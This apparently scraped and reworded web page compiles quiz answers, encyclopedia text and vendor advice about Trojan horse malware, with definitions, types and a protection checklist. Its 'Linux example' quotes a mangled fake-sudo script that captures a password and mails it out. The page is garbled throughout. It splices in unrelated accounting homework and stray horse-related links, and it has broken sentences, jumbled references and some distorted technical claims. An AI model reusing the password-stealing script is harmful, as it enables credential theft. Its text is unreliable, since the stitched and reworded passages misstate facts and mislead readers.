Which Of The Following Describes A Trojan Horse? (Correct answer)

In computing, a Trojan horse is a program downloaded and installed on a computer that appears harmless, but is, in fact, malicious. When the user clicks on the email attachment or downloads the free program, the malware that is hidden inside is transferred to the user’s computing device.

  • A Trojan horse is a malicious program that appears harmless on the surface, but actually has malicious intent. The malware that is hidden inside the email attachment or the free program is transferred to the user’s computer when the user clicks on the email attachment or downloads the free program. What Is A Trojan Horse Simple Definition?

What is the description of Trojan horse?

A Trojan horse is thus anything that looks innocent but, once accepted, has power to harm or destroy —for example, a computer program that seems helpful but ends up corrupting or demolishing the computer’s software.

Which definition best defines a Trojan horse?

Definition: Trojan or Trojan horse is the name given to a computer virus. It is a type of computer software that is camouflaged in the form of regular software such as utilities, games and sometimes even antivirus programs.

What are Trojan horses answer?

A trojan horse is a program appearing to be something safe, but is performing malicious tasks, such as giving access to your computer or sending personal information to other computers.

Which of the following best defines the term Trojan horses as it relates to techniques used in cyber attacks?

In cybersecurity terms, a Trojan horse is a piece of malware that can damage, steal, or otherwise harm your data or your computer network. Often referred to simply as a Trojan, this malicious software is usually disguised as a legitimate computer program.

Was there a Trojan horse?

Trojan horse, huge hollow wooden horse constructed by the Greeks to gain entrance into Troy during the Trojan War. The horse was built by Epeius, a master carpenter and pugilist.

How do Trojan horses work?

How Do Trojan Horses Work? Trojan viruses work by taking advantage of a lack of security knowledge by the user and security measures on a computer, such as an antivirus and antimalware software program. Once this happens, malware or other malicious content is installed and activated on the computer or other devices.

Why is it called Trojan?

Trojan malware takes its name from the classical story of the Trojan horse, because it imitates the technique to infect computers. A Trojan will hide within seemingly harmless programs, or will try to trick you into installing it. Unlike viruses, Trojans do not self-replicate by infecting other files or computers.

What is Trojan horse Mcq?

Answer:It is a rogue program which tricks users.

What is a Trojan horse quizlet?

STUDY. Trojan Horse ( or Trojan) A malware program that appears to perform some useful task, but which also does something with negative consequences (e.g., launches a keylogger)

Who hid in the Trojan horse?

There is no Trojan Horse in Homer’s Iliad, with the poem ending before the war is concluded. But in the Aeneid by Virgil, after a fruitless 10-year siege, the Greeks at the behest of Odysseus constructed a huge wooden horse and hid a select force of men inside, including Odysseus himself.

What is a characteristic of a Trojan horse as it relates to network security?

Unlike viruses, Trojan horses do not replicate themselves but they can be just as destructive. Trojans also open a backdoor entry to your computer which gives malicious users/programs access to your system, allowing confidential and personal information to be theft.

Which of the following is an example of Trojan horse?

Examples of govware trojans include the Swiss MiniPanzer and MegaPanzer and the German “state trojan” nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.

What is the famous Trojan horses?

Storm Worm was a Trojan horse that infected computers, sometimes turning them into zombies or bots to continue the spread of the virus and to send a huge amount of spam mail.

What is a famous example of a Trojan?

Emotet, trojan, 2018 Emotet is a trojan that became famous in 2018 after the U.S. Department of Homeland Security defined it as one of the most dangerous and destructive malware.

which of the following describes a trojan horse – Brainly.com

Homework Chap 1 I Saved Help Saveamp; Exit is required. Emerl Cooking Services reports the following revenues and costs for the year ending December 31, 2024. 4 Profits from.services Postage costs are incurred. Approximately $76,000 was spent on legal expenses. 1,550 dollars in rent expenses Salaries cost a total of 2,450. Supplies cost $ 10,700, 25,000, and 15,000 dollars. 10.5 out of 100 points In addition, the company’s common stock balance at the start of the year was $250,000, and the company’s retained profits balance at the start of the year was $34,000.

Skipped Required: 1.


References for the eBook Fill in the blanks with your responses in the boxes provided in the table below.

  1. Prepare a Profit and Loss Statement.
  2. Profit and Loss Statement for the Fiscal Year Ending December 31, 2024 If you have to incur expenses, when is it morally right to oppose a rule?
  3. In addition, the building is subject to a 50,000 mortgage.
  4. What is the breakeven point in terms of cash and units?
  5. The Fuel Economy Guide published by the United States Department of Energy gives information on the fuel economy of automobiles and trucks.
  6. The Class column specifies the vehicle’s size, which can be either Compact, Midsize, or Large.
  7. The Gasoline Type column indicates whether the vehicle runs on premium (P) or regular (R) fuel, while the Highway MPG column indicates the vehicle’s fuel efficiency rating for highway driving in terms of miles per gallon traveled.
  8. (Consider that engine displacement is represented by x1, ClassMidsize is represented by x2, ClassLarge is represented by x3, FuelPremium is represented by x4, Highway MPG is represented by y.
  9. The variations or discrepancies in these ratings between your two chosen peer firms are important considerations.

The battle between Starbucks vs McDonald’s In order to balance her budget, Donna has to reduce her spending by a certain amount. Please include at least two examples of entrepreneurs and intrapreneurs.” ​

What is a Trojan horse?

There are two types of Trojan Horses. The Trojan Horse in Homer’s Iliad The Trojan Horse is a literary device used by the Latin author Virgil in his epic poem Aeneid. After failing to capture Troy, the Greek army was nearing the end of its endurance. Odysseus, on the other hand, devises a strategy that incorporates this horse. The Greek army constructed a massive hollow wooden horse, stuffed it with a few hundred warriors, and stationed it outside the Trojan gates to guard the entrance. After that, the Greeks boarded their ships and went a short distance in order to conceal their fleet.

  1. The Greek army rushes in and takes the city when the horse is carried inside, and the soldiers jump out and unlock the Trojan gates during the night to let the entire Greek army to rush in and seize it.
  2. Computers are infected with a Trojan horse.
  3. Trojan horses, in contrast to viruses, can not multiply themselves, although they may be just as harmful as viruses.
  4. Trojan horses are classified depending on how they infiltrate systems and the harm they inflict, and their categorization is broken down further.
  5. Essentially, this is a virus that tries to trick the user into believing that it is a useful program.
  6. Once this form of virus has been run or placed in the system, it will begin infecting additional files on the computer.
  7. It will subsequently transmit this information to internet servers that have been specifically selected by the virus’s creator.

During this time, the user will discover that the infected machine has become extremely sluggish, or that unexpected windows open up without the user’s involvement or knowledge.

It has the potential to spread in a variety of ways.

In order to spread the virus to unsuspecting users, the infection’s creator often employs a variety of spamming strategies to do this.

Once the user clicks on the attachment, the Trojan Horse Virus infects the system and begins doing the operations listed above as soon as the attachment is opened.

In addition to sending copies of itself to persons in the address book of a user whose computer has already been infected by the virus, this virus infects additional computers by sending copies of itself to other users’ computers.

Avoiding opening email attachments or files that have been supplied to you by unknown senders is the most effective method of preventing a Trojan Horse Virus from accessing and infecting your computer.

Accordingly, installing and maintaining an anti-virus program on your computer is an excellent approach to safeguard your computer against dangerous applications such as this hazardous application. The following are the seven most common varieties of Trojan horses:

  • Trojans that provide remote access
  • Trojans that send data
  • Trojans that are destructive
  • Proxy Trojans
  • FTP Trojans
  • Trojans that disable security software
  • Trojans that cause a denial of service (DoS) attack

An example of malware is a Trojan horse, which masquerades as a genuine file or useful software, with the goal of gaining illegal access to a computer to the hacker who created it. Trojan horses do not seek to infiltrate other files in the same way that a computer virus does. Trojan horses are computer programs that can steal information or cause damage to their host computer systems. In order to infiltrate target systems, Trojans may employ drive-by downloads or install themselves through online games or internet-based programs.

  • In order to infiltrate the victim’s computer, the virus must first seem as a beneficial software to the victim.
  • Building a big wooden horse and concealing several hundred Greek troops within the horse was a successful operation.
  • The Greek warriors crept out of the horse, unlocked the gates, and wreaked havoc on the city of Troy in the wee hours of the morning.
  • When it comes to computers, a Trojan horse is a form of malware that infiltrates your computer by pretending to be harmless before unleashing devastation once it has gained access.
  • It is a virus that tries to trick the user into believing that it is truly advantageous to them.
  • It is also often capable of stealing crucial information from your computer and may even be able to obtain some level of control over your computer as a result of this virus’s presence on your computer.

Which of the following best describes a Trojan Horse A A macro virus embedded in

42. Which of the following best characterizes the characteristics of a Trojan Horse? A macro virus embedded in an emailB a harmful computer program placed in an executable fileA macro virus inserted in an email C. A computer software that is embedded within a legitimate program. An application software that contains a harmful computer program called a backdoor CA is the answer. During its execution, a Trojan horse might be either malevolent or nonmalicious, according on its classification. As a result, a harmful computer program embedded in an application software and a malicious computer program embedded in an executable file are both wrong responses since they do not take into account nonmalicious Trojan horses.


Which of the following levels of the OSI model offers services for secrecy, authentication, and data integrity?

What is a Trojan horse and what damage can it do?

When the horse’s stomach opened in the middle of the night, it was too late. At last, the Greeks had succeeded in taking the long-besieged city of Troy, so drawing the Trojan War to a close. Thousands of years later, the tale of the Trojan horse is still alive and well, but with a negative connotation in today’s society. After all, what was once hailed as a great trick and a superb job of engineering is today seen as a hostile digital insect whose single goal is to cause havoc on the systems of its victims while remaining undetected.

The following are examples of such actions:

  • The act of deleting information, blocking information, modifying information, copying information, or interfering with the operation of computers or computer networks.

Trojan horses, in contrast to computer viruses and worms, are incapable of reproducing themselves.

Types of Trojan

They are one of the most basic Trojans, but they are also one of the most hazardous sorts of Trojan. This is due to the fact that, in their capacity as a gateway, they have the ability to either load a wide variety of viruses onto your system or, at the very least, make your computer exposed to attack. Botnets are frequently established with the use of a backdoor. Your computer, without your awareness, becomes a member of a zombie network that is used to launch attacks against other computers.


Exploits are programs that include data or code that takes advantage of a vulnerability in an application running on your computer and sends it to the server.


Rootkits are software programs that are meant to disguise specific items or actions in your computer’s operating system. Most of the time, their primary goal is to keep dangerous programs from being noticed in order to lengthen the amount of time that they may be executed on a machine that has been infected with them.

Dropper/downloader Trojans

Emotet malware is one of the most well-known dropper Trojans. Although the malware has now been rendered harmless by antivirus software, it cannot, in contrast to a backdoor Trojan, execute any code on the computer that it is installed on. Instead, it spreads other viruses, such as the banking Trojan Trickbot and the ransomware Ryuk, which are both extremely dangerous. Thus, droppers and downloader Trojans are similar in nature, with the distinction being that downloaders require a network resource in order to draw malware from the network.

Both sorts of Trojans have the ability to be remotely updated in secret by the programmers responsible, for example, so that virus scanners do not notice them when new definitions are released.

Banking Trojans

Banking Trojans are among the most common types of Trojans to be found. This is not surprising given the increasing use of online banking, as well as the carelessness of certain users – they represent a potential technique for attackers to obtain money in a short period of time. In order to do this, they must first get access credentials to bank accounts. Phishing strategies are used to do this, such as redirecting purported victims to an impersonated website where they are instructed to submit their access credentials.

Therefore, while doing online banking transactions, be sure to utilize safe means of verification, such as utilizing the bank’s app, and never enter your access details into a web interface wherever possible.

DDoS Trojans

Despite efforts, distributed denial-of-service (DDoS) assaults continue to plague the internet. The server or network is bombarded with requests in these assaults, which are often carried out by a botnet. Amazon, for example, was able to fend off a record-breaking attack on its computers in mid-June 2020. The Amazon web services were targeted with a data flow of 2.3 gigabytes per second for more than three days, according to the company. To obtain that level of computational power, it is necessary to have a massive bot network.

See also:  How Much Do Horse Trainers Make? (Perfect answer)

On the surface, they appear to be operating normally, yet they are actually operating in the background as attackers.

Websites or even whole networks may become inaccessible if a botnet assault or a distributed denial of service (DDoS) attack is successful.

Fake antivirus Trojans

False antivirus software Trojan horses are exceptionally sneaky and cunning. Instead of safeguarding, they do catastrophic damage to any gadget they touch. Because of the purported virus discoveries, they want to instill fear in the hearts of unwary consumers, convincing them to spend money to get adequate protection. However, instead of receiving an useful virus scanner, the user is presented with even more issues, since their purchase information is transmitted to the Trojan’s creator for future exploitation.


The information included in user accounts of online gamers is stolen by this sort of software.

Trojan-IM (Instant Messaging)

Trojan-IM programs are designed to steal your login information and passwords for instant messaging applications such as ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype, and other similar programs. One may claim that these messengers are no longer in widespread usage these days. Even new message services, on the other hand, are not immune to Trojans. Trojans might potentially target popular messaging apps such as Facebook Messenger, WhatsApp, Telegram, and Signal. Recently, a Windows Trojan was commandeered using a Telegram channel, which occurred in December 2020.

Skygofree, a Trojan horse developed by Kaspersky Lab, was discovered in January 2018 by security researchers.

The Skygofree Trojan may also be used to spy on users of the popular messaging app WhatsApp.


This sort of Trojan might change data on your computer in such a way that your machine no longer functions properly or that you are unable to access specified data.

The thief will only restore your computer’s performance or unblock your data if you have given them the ransom money that they have demanded in exchange for your machine.

SMS Trojans

Despite the fact that they appear to be a relic from another century, they are still operational and constitute a huge threat to society. SMS Trojans, such as the Android virus, are quite common. Faketokencan may function in a variety of ways. Faketoken, for example, sends large quantities of SMS messages to costly overseas lines while masquerading as a typical SMS application on the operating system. The charges associated with this must be covered by the smartphone owner. A other type of SMS Trojan is one that establishes connections to costly premium SMS providers.


Trojan-Spy programs can monitor how you use your computer, for example, by monitoring the data you enter through your keyboard, collecting screenshots, or compiling a list of all the apps currently operating on your computer.


When you use a computer, these apps can collect email addresses from it. In addition, there are more sorts of Trojans, which are as follows:

  • Trojan-ArcBomb
  • sTrojan-Clicker
  • sTrojan-Notifier
  • sTrojan-Proxy
  • sTrojan-PSW

Trojans as a threat to all end devices

Trojan horses are no longer limited to Windows systems; they are now increasingly targeting Mac computers and mobile devices. So you should never feel too secure or go online without up-to-date antimalware protection, such as Kaspersky Internet Security from Kaspersky Lab. Most malware infects computers by way of infected attachments, corrupted text messages, or fraudulent websites that appear legitimate. However, there are secret service Trojans that may be installed on target computers remotely, without the user’s knowledge and without the targets’ involvement in the installation process at all.

Pegasus is equipped with an extensive arsenal of interception possibilities.

Criminals are being monitored and tracked down in Germany as well, thanks to the employment of a government-sponsored Trojan.

Cybercriminals want to cause maximum damage with Trojans

Whereas law enforcement agencies utilize surveillance tools to track down and punish illegal activity, cybercriminals have the exact opposite goal in mind. In the latter situation, it is all about gaining personal gain at the expense of their victims in order to justify their actions. In order to do this, the crooks employ a variety of programs, and in some cases, complete malware chains. How do they manage to accomplish it? An example of this would be a backdoor that was placed on the computer without the user’s knowledge through an infected email attachment.

Another example is a keylogger, which records keystrokes such as passwords or confidential material, a banking Trojan, which steals financial data, or ransomware, which encrypts the entire machine and only releases the hijacked data once a considerable sum of bitcoin has been paid in bitcoin.

The “Trojan King,” strictly speaking, is a bot network that searches for victims by sending spam emails and infecting Word or Excel documents with malicious code.

The British Standards Institution (BSI) has created an additional website with information on Emotet. In conclusion, I would want to say that

  • Emotet is widely regarded as one of the most destructive and dangerous Trojans on the internet. It has not yet been determined who is behind Emotet. The amount of harm produced by Emotet is in the millions of dollars. The majority of the targets are businesses. If Emotet scans the saved email addresses from address books and adds them to its massive database, private users may still be impacted. For further protection, deactivate macros in Word and Excel and do not open attachments from emails from unknown senders in addition to using the most up-to-date software available.

Piggybacking onto the end device

Trojan horses may be discovered in a variety of places, not only email attachments. They can also “piggyback” on programs that are advertised as being free. This reinforces the need of refraining from using questionable sources for software downloads such as codec packs or pirated applications, even if doing so may result in a few euros in savings. The damage that Trojans may inflict often outweighs the value of the software that would have been obtained through legitimate methods. It should be noted that a Trojan horse is not to be mistaken with a virus.

As a result, the following is a checklist for protecting yourself and your equipment from Trojans:

  1. Consider your actions before opening attachments from emails. Make sure you know who sent it and what it says, and think about whether or not you really need to open the attachment. Maintain the most recent versions of your mobile and fixed systems at all times. Installation of security updates on a regular basis is recommended, both for the operating system and for the programs that are installed
  2. Allowing macros in Word and Excel is not recommended. Do not simply click on links without considering your options. In addition, there is the risk of a drive-by infection occurring. A virus installation that takes place in the background while a user is browsing phony websites, which ensures that the malware is downloaded onto the home system without the user’s knowledge. Downloading apps from untrustworthy sites should be avoided. Installing programs that are not available in the Google Play Store or the Apple Store should be avoided on mobile devices. Always show all file extensions in a single window. Using this tool, you may determine whether or not a putative picture – generally with the jpg extension – is supported by an executable file with the exe extension. Make use of two-factor authentication, which may be accomplished using a mobile app and strong passwords (preferably through a password manager) as an extra security safeguard
  3. Always scan your system using a virus scanner that has the most up-to-date virus definitions available. Harmful applications and malicious information are protected from your computer by the Kaspersky Internet Security Suite. Regular backups of your data are a good idea. Not just on cloud services, but also on a physical data carrier, such as a mobile SSD or HDD hard disk connected through a USB port.

Be careful when surfing the web

The Trojans described below are the most well-known varieties. One thing that all of them have in common is that they can only be installed on a computer or mobile device with the assistance of the user. These risks should be avoided, however, if you use caution when surfing the web, do not open email attachments without thinking, and only download programs from trusted sources. An up-to-date operating system, as well as a virus scanner that is always on, will provide you with even more protection against Trojans.

These security solutions protect against Trojans and other online threats:

Kaspersky Internet Security is a security software program developed by Kaspersky Labs. Kaspersky Total Security is a security suite developed by Kaspersky Labs. Kaspersky Security Cloud is a service provided by Kaspersky Lab. Articles that are related: Detecting malware – what encryption can tell you Trojans are different. Advice on how to prevent being a victim of phishing Data security against ransomware — how to keep your information safe

7 Flashcards

Several weeks ago, a severe security breach happened within your firm. An attacker was able to access into your company’s internal network and steal data by exploiting the credentials issued to a vice president in your firm to establish a VPN connection. Your company’s higher management has unlisted home phone numbers and addresses for security reasons, and all of these numbers and addresses are kept confidential. Before the incident, though, someone was caught on tape rummaging through the vice president’s garbage cans, according to security camera footage from her residence.

You have reason to believe that the attacker discovered the sticky note in the garbage and used the credentials to log onto the network.

You discovered images of her house on the internet, but you didn’t notice anything in the pictures that would reveal her residence’s location.

Which security flaw is most likely to have been the root cause of the security breach?

Her smart phone has been infected with sideloaded applications. Her smart phone had been set to allow geotagging. Her smart phone was used to launch an attack on the Christmas Tree. On her smart phone, she had chosen passwords that were too easy to guess.

Practice questions for Security+ (Security plus) exam: Authentication

Previous Previous page of results Next page of results Q3. In your opinion, which of the following best describes a Trojan Horse? A computer virus is a program that spreads throughout a computer system by infecting other programs that are running on the computer system. B. A program that spreads itself (without the assistance of any other program) across a network, from one computer to another, without the assistance of another program. C. A program that, when downloaded and executed, appears to be harmless but is capable of causing significant damage to a computer system.

  • The correct response is: C Explanation: Virus: A virus is a program that spreads itself by infecting other programs that are running on the same computer system as the virus.
  • Worm: A worm is a computer program that can spread itself from one computer to another over a network without the assistance of any other program.
  • On the basis of a security flaw in the operating system or any other applications running on the system, the replication is carried out.
  • For example, a download with the words “birthday greetings” or something similar.
  • Additionally, the trojan’s contents could be a virus or worm, which would then spread the damage.

It can be a virus or a Trojan horse, but it is only activated when a specific event occurs in the future.Home Previous Next Previous Disclaimer: None of the Simulation Exams practicetests, study guides, and/or material is sponsored, endorsed, or affiliated with CompTIA ® or any other company, and none of the material is available for free.

CompTIA ® owns the trademarks A+TM, Network+TM, i-Net+TM, Server+TM, and Security+TM, all of which are registered trademarks.

Thank you for your interest in Simulation Exams.

Before you download, install, and/or use any software from SimulationExams.com, please read the readme file provided.

Cookies are used to improve your overall experience on our site. By continuing to browse this website, you acknowledge and agree to our use of cookies. More information can be found here.

Trojan horse (computing) – Wikipedia

In computers, a trojan horse is any malicious software that deceives people about its actual intentions. Trojan Horse is a word that comes from theAncient Greek legend of the deceptiveTrojan Horse, which resulted in the collapse of the city ofTroy. Trojans are often propagated using some type of social engineering, such as tricking a user into opening an email attachment that appears to be unimportant (e.g., a regular form to be filled out), or tricking a user into clicking on a bogus advertising on social media or elsewhere.

Ransomware attacks are frequently carried out through the use of a trojan horse.

Use of the term

It is unclear when or when the notion, as well as the phrase for it, initially appeared, but by 1971 the first Unix handbook presumed that its readers were familiar with both: Also, if the set—user—ID bit is enabled, it is not permitted to alter the owner of a file; otherwise, Trojan Horses capable of misusing other people’s data might be created. Another early mention may be found in a 1974 study by the United States Air Force on the investigation of vulnerability in Multicscomputer systems.

See also:  How To Bet Horse Racing? (Solution)

A study on the security of Multics informed him about the possibility of the presence of trojans, which he shared with the group.


Once installed, trojans have the ability to carry out a variety of destructive acts. Many people choose to make contact with one or more Command and Control (C2) servers located around the Internet and wait for instructions. In addition, because individual trojans often communicate over a unique set of ports, it can be rather straightforward to identify and identify them. Furthermore, additional software may be able to “take over” the trojan, allowing it to operate as a gateway for harmful activity.

Govware is often a Trojan horse program that is used to intercept communications from the target computer’s network interface card.

SwissMiniPanzer and MegaPanzer, as well as the German “state trojan” called R2D2, are examples of govware trojans to watch out for.

Trojans are becoming increasingly prevalent as a result of the growing popularity of botnets among hackers, as well as the availability of advertising services that allow writers to breach the privacy of their customers.

According to BitDefender, around 15% of PCs are members of a botnet, which is often recruited through a trojan infection.

Linux example

A Trojan horse is a software that appears to fulfill an obvious purpose, but when it is executed, it compromises the security of the computer’s user. An example of a straightforward application is a new version of the Linuxsudocommand. The command is then copied to a place that is accessible to the public, such as /tmp. A Trojan horse might be run if an administrator happens to be in that directory at the time and executessudo on the command line. Here is an example of a functional version: Turn off the character echo to the screen with the sudo command.

sttyechoecho $x|mail -s |mail -s “‘whoami’ password”[email protected] “‘whoami’ password” sleep1echo Sorry for the inconvenience.

Example: PATH=/usr/local/bin:/usr/bin

Notable examples

  • R2D2 is an acronym for the FBI
  • 0zapftis is an abbreviation for R2D2. State Trojaner– DigiTask
  • DarkComet– CIA/NSA
  • FinFisher– Lench IT solutions / Gamma International
  • DaVinci / Galileo RCS– HackingTeam
  • Magic Lantern– FBI
  • SUNBURST– SVR / Cozy Bear(suspected)

Publicly available

  • Late 1980s
  • Netbus– 1998 (published)
  • Back Orifice– 1998 (published)
  • Beast– 2002 (published)
  • Bifrost trojan– 2004 (published)
  • DarkComet– 2008-2012 (published)
  • Blackhole exploit kit– 2012 (published)
  • Gh0st RAT– 2009 (published)
  • MegaPanzer BundesTrojaner– 2009 (published)
  • MEMZby Leurak– 2016 (published)
  • EGABTR– late 1980s
  • Back

Detected by security researchers

  • Twelve Tricks was created in 1990
  • Clickbot.A was created in 2006 (discovered)
  • Zeus was created in 2007 (discovered)
  • Flashback trojan was created in 2011 (discovered)
  • ZeroAccess was created in 2011 (discovered)
  • Koobface was created in 2008 (discovered)
  • Vundo was created in 2009 (discovered)
  • Coreflood was created in 2010 (discovered)
  • Tiny Banker Trojan was created in 2012 (discovered)
  • ShedunAndroid malware was created in 2015 (discovered).


The phrase “trojan horse” in computer jargon comes from the legendaryTrojan Horse of the ancient city of Troy, which inspired the term. As a result, the word “Trojan” is frequently capitalized. While style guidelines and dictionaries differ, many recommend that “trojan” be written in lower case for everyday use.

See also

  • Industrial espionage
  • Computer security
  • Cuckoo’s egg (metaphor)
  • Cyber spying
  • Dancing pigs
  • Exploit (computer security)
  • In accordance with the principle of least privilege
  • Remote administration
  • Remote administration software
  • Reverse connection
  • Malicious software
  • Scammers
  • Rogue security software
  • Privacy-invasive software Zombie (computer science)
  • Technical support scam
  • Timeline of computer viruses and worms


  1. Carl E. Landwehr, Alan R. Bull, John P. McDermott, and William S. Choi are among the authors of this work (1993). a taxonomy of computer software security issues, illustrated through case studies Document from the DTIC. CiteSeerX10. “Trojan Horse Definition” was retrieved on April 5, 2012, and “Trojan horse” was retrieved on April 5, 2012. Webopedia. Retrieved on April 5, 2012
  2. “What is a Trojan horse? – Definition from Whatis.com”
  3. “What is a Trojan horse?” “Trojan Horse:N” was discovered on April 5, 2012. “Difference between viruses, worms, and trojans,” according to a Wikipedia article from April 5, 2012. Symantec Security Center is a security management tool. Broadcom Inc. is a telecommunications company based in San Jose, California. The original version of this article was published on August 19, 2013. “VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)” was retrieved on March 29, 2020 from “VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00”. UNIX PROGRAMMER’S MANUAL, November 3, 1971
  4. Thompson, K. “UNIX PROGRAMMER’S MANUAL, October 9, 1995” (PDF). Retrieved on March 28, 2020
  5. Karger, P.A., and Schell, R.R., “Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193″(PDF), Headquarters Electronic Systems Division: Hanscom AFB, MA,II
  6. Ken Thompson (1984), “Reflection on Trusting Trust” (PDF), HQ Electronic Systems Division: Hanscom AFB, MA,II
  7. HQ Electronic Systems Division: Hanscom AFB Commun. ACM.27(8): 761–763, doi:10.1145/358198.358210
  8. Paul A. Karger and Roger R. Schell (2002), “Thirty Years Later: Lessons from the Multics Security Evaluation” (PDF), ACSAC: 119–126
  9. Paul A. Karger and Roger R. Schell According to Karger and Schell, Thompson included the following reference in a later version of his Turing conference: Crapanzano, Jamie (November 1989), “On Trusting Trust.” Unix Review, 7(11): 70–74
  10. Thompson, Ken (November 1989), “On Trusting Trust” (2003). The Deconstruction of SubSeven, the Trojan Horse of Opportunistic Choice (Report). The SANS Institute is a non-profit organization dedicated to information security. abBasil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. “Häufig gestellte Fragen (Frequently Asked Questions)”. Retrieved on May 10, 2021. Department of Justice and Police of the United States of America The original version of this article was published on May 6, 2013
  12. Dunn, John (August 27, 2009). “Swiss coder publicizes government espionage Trojan.” TechWorld. The original version of this article was published on January 26, 2014. “German federal police deploy trojan virus to overcome phone encryption,” according to a report published on January 10, 2021. According to a BitDefender Malware and Spam Survey, E-Threats are adapting to online behavioral trends, according to DW. Retrieved April 14, 2018. BitDefender. The original version of this article was published on August 8, 2009. In Datta, Ganesh (August 7, 2014), “What Are Trojan Horses?,” he explains what Trojan horses are. SecurAid. The original version of this article was published on August 12, 2014. Obtainable on March 27, 2020
  13. In Wood, Patrick H., and Kochan, Stephen G. (1985), UNIX System Security (Hayden Books, p. 42, ISBN 0-8104-6267-2), UNIX System Security is defined as Kulakow and Seth (1998). Was it still a Trojan horse or was it actually a legitimate Remote Control Administration Tool? ” (Report). The SANS Institute is a non-profit organization dedicated to information security. Retrieved on May 10, 2021
  14. “Mega-Panzer.” SourceForge
  15. “Mini-Panzer.” SourceForge
  16. “Trojanized adware family abuses accessibility service to install any applications it wants – Lookout Blog”
  17. “Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog”
  18. Dave and Neal (November 20, 2015). “The Android Accessibility Service is under attack by the Shedun trojan adware.” The Inquirer is a newspaper published in the Philippines. Incisive Business Media is a marketing firm that specializes in incisive business communications. The original version of this article was published on November 22, 2015. Retrieved March 27, 2020.:CS1 maint: unsuitable URL (link)
  19. “Lookout discovers new trojanized adware
  20. 20K popular applications caught in the crossfire – Lookout Blog”
  21. 20K popular apps caught in the crossfire – Lookout Blog”
  22. “The malware Shuanet, ShiftyBug, and Shedun has the potential to auto-root your Android.” The New York Times and Technology Review published an article on November 5, 2015. (November 9, 2015). “Welcome to Shedun, Shuanet, and ShiftyBug, a new family of Android malware that is virtually impossible to remove”
  23. “Android adware may install itself even when consumers explicitly refuse it” On November 19, 2015, Collins Advanced Dictionary defined “trojan” as “trojan horse.” “trojan horse.”Microsoft Style Guide. Microsoft. RetrievedMarch 29,2020
  24. “trojan horse.”Microsoft Style Guide. Microsoft. RetrievedMarch 29,2020

External links

  • At Wikimedia Commons, you can find images and videos related to Trojan horse (malware) “CA-1999-02 is a CERT advisory. Trojan Horses are a type of horse that is used to deceive others” (PDF). The Software Engineering Institute at Carnegie Mellon University is a research center dedicated to software engineering. The original version of this article was archived on October 17, 2000. 15th of September, 2019
  • Retrieved

What Is a Trojan Horse? Trojan Virus and Malware Explained

A Trojan Horse Virus is a sort of malware that infiltrates a computer by masquerading as a genuine software and then spreading across the system. The distribution method often involves an attacker employing social engineering techniques to conceal malicious code within genuine software in order to attempt to get access to a user’s system through their program. The simplest approach to answer the question “what is Trojan” is to say that it is a sort of malware that is often camouflaged as an attachment in an email or as a free-to-download file, after which it is transferred onto the user’s computer.

Unusual behavior on a device, such as the modification of computer settings without warning, is an indication that a Trojan is active on the device.

History of the Trojan Horse

It is possible to find the original account of the Trojan horse in the Aeneid by Virgil and the Odyssey by Homer, as well as other ancient texts. According to the myth, the enemies of the city of Troy were able to gain entry into the city gates by pretending that a horse had been sent to them as a gift. As soon as the troops went inside the massive wooden horse, they climbed out and opened the door for the other soldiers to enter. According to the narrative, there are a few aspects that make the phrase “Trojan horse” a fitting designation for these sorts of cyber attacks:

  • The Trojan horse provided a one-of-a-kind countermeasure to the target’s defenses. According to the original account, the assailants had been laying siege to the city for ten years and had been unsuccessful in their attempts to capture it. They were able to gain entry because of the Trojan horse, which they had been seeking for a decade. A Trojan virus, in a similar vein, may be a useful tool for getting past an otherwise strong set of protections
  • In this case, the Trojan horse looked to be a genuine gift. Another type of Trojan virus is one that seems to be legal software
  • In this case, the troops in the Trojan horse were in charge of the city’s defensive system. When a Trojan virus infects your computer, the malware takes over and makes it susceptible to other “intruders.”

How Do Trojans Work?

A Trojan horse, in contrast to computer viruses, cannot manifest on its own; instead, it requires a user to download the server side of the program in order for it to function. This implies that the executable (.exe) file must be implemented and the program must be installed in order for the Trojan to be able to attack the system of a device. An email with a legitimate-looking attachment or an email with a legitimate-looking attachment that is spammed in order to reach as many people as possible is where a Trojan virus spreads.

  1. It is also possible for devices to become infected by a Trojan through the use of social engineering methods, which cyber criminals employ to trick users into installing a malicious program.
  2. A computer that has been infected with Trojan software has the potential to transfer it to other systems.
  3. Hackers can then use the zombie computer to spread malware across a network of devices, known as a botnet, which is a collection of compromised computers.
  4. The attachment, on the other hand, includes malicious code that executes and installs the Trojan on the recipient’s computer.
  5. The infection will remain undiscovered until the user does a certain activity, such as visiting a specific website or using a specific banking application.
  6. Depending on the type of Trojan and how it was developed, the virus may either destroy itself or return to a dormant state on the device, or it may continue active on it.

Trojans may also target and infect smartphones and tablets through the use of a type of mobile malware known as mobile malware. If an attacker redirects traffic to a device connected to a Wi-Fi network and then uses that device to perform cyberattacks, this is possible.

Most Common Types of Trojan Malware

There are many distinct varieties of Trojan horse viruses that cyber thieves employ to carry out a wide range of various acts and employ a wide range of different attack strategies. The following are the most often encountered Trojans:

  1. Malicious software known as a backdoor Trojan allows an attacker to obtain remote control over a computer and take control of it by exploiting a backdoor. Consequently, the malicious actor is allowed to perform whatever action they choose on the device, such as deleting files, resetting the computer, stealing data, or installing malware. A backdoor Trojan is widely employed in the creation of a botnet, which is comprised of a network of zombie computers. Banker Trojan: A banker Trojan is a type of malware that is designed to steal information about a user’s banking and financial accounts. Attempts are made to steal account information from credit and debit cards, e-payment systems, and internet banking systems. Distributed denial-of-service attacks (DDoS) (DDoS) Trojan: These Trojan programs are used to launch assaults on networks, causing them to become overburdened with traffic. This exploit will send repeated queries from a single computer or from a group of machines in an attempt to overwhelm a target web address and cause a denial of service to occur. Trojan horse that downloads and installs more dangerous applications on a machine that has already been infected with malware is referred to as a downloader Trojan (or downloader virus). It is possible that further Trojans or other forms of malware, such as adware, have been installed. Tornadoes that are designed to exploit particular vulnerabilities in an application or computer system are known as exploit malware programs, or exploit trojans. In order to exploit a known weakness, the cyber criminal will first target victims via a means such as a phishing attack, and then utilize the code included within the software. Trojan horse for fake antivirus software: A Trojan horse for fake antivirus software Trojan horse malware imitates the 